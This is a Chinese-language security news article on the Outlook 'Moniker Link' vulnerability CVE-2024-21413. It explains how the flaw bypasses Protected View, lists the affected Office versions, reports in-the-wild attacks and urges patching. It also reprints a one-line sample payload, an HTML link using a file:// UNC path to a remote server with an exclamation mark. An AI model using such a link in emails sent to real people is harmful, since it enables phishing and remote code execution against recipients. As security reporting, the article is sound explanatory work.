黑客利用Outlook漏洞展开攻击 只需打开带有恶意链接的邮件即可触发漏洞
![](https://imgs.knowsafe.com:8087/img/imgsaideep/0xu/2021/1/20/33f1809efeed0f0920ba2ba3e893566e.jpg)
CVE-2024-21413 漏洞是微软在 2024 年 1 月公布并修复的安全漏洞,该漏洞由网络安全公司 CheckPoint 安全研究人员 Haifei Li 发现并通报给微软,主要涉及到 Outlook 邮件客户端的远程代码执行问题。
该漏洞影响 Microsoft Office 2016、Microsoft Office 2019、Microsoft Office LTSC 2021、Microsoft 365 企业版应用,漏洞评分达到 9.8/10 分。
这枚漏洞的描述是存在缺陷的 Outlook 版本打开带有恶意链接的电子邮件时输入验证不当,借助漏洞黑客可以绕过受保护的视图 (该视图会以只读方式打开 Office 文件用来阻挡嵌入的有害内容) 并以编辑模式打开恶意的 Office 文件。
在这种情况下黑客可以向目标组织发送包含恶意代码的钓鱼邮件,只需要目标组织的员工打开该邮件即可触发漏洞并实现远程代码执行,因此造成的危害还是非常大的。
目前已经有黑客开始利用这枚漏洞展开攻击,考虑到其潜在危害性,如果企业至今没有升级 Outlook 版本封堵漏洞那可能会出现严重的安全问题。
CheckPoint 的研究人员也透露了该漏洞的工作方式:
这个被称为 Moniker Link 的漏洞可以让黑客使用 file:// 文件协议指向黑客控制的服务器 URL 并添加感叹号来绕过 Outlook 内置的受保护视图。
#下面为示例代码,基于安全考虑研究人员并未公布完整的利用方式 *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
考虑到这枚漏洞已经公布 1 年了,这时候才有黑客利用也不是让人惊讶的事情,如果都 1 年了企业还没有更新 Outlook 封堵漏洞那也只能自求多福了。
[广告]赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
![公众号](/static/sslhub/img/ewm.jpg)
随时掌握互联网精彩
- WordPress 最稳定的版本是哪一个?
- AppNode打包的软件靠谱吗?
- 123云盘付费链接通过审核后如何分享给我的用户?
- 什么样的CISO对企业来说是有用的?
- 历史上的今天:索尼诞生;Bungie 成立;数据排序结构先驱出生
- 易安联完成新一轮融资,领跑中国零信任安全
- 云原生落地困挑战无处不在?我选Serverless
- 创投 | Augury首席执行官Saar Yoskovitz谈人工智能赋能的声音检测技术如何守护机器健康(上)
- 骁龙至,聚此时!2021骁龙奇遇派对直播预约中
- 因一个 Bug,Cassandra 4.0 暂停发布
- 搭载高通216沉浸式家庭联网平台,全新Wi-Fi 6路由器H3C BX54鲸路由发布
- Firefox发布安全更新 新增仅HTTPS模式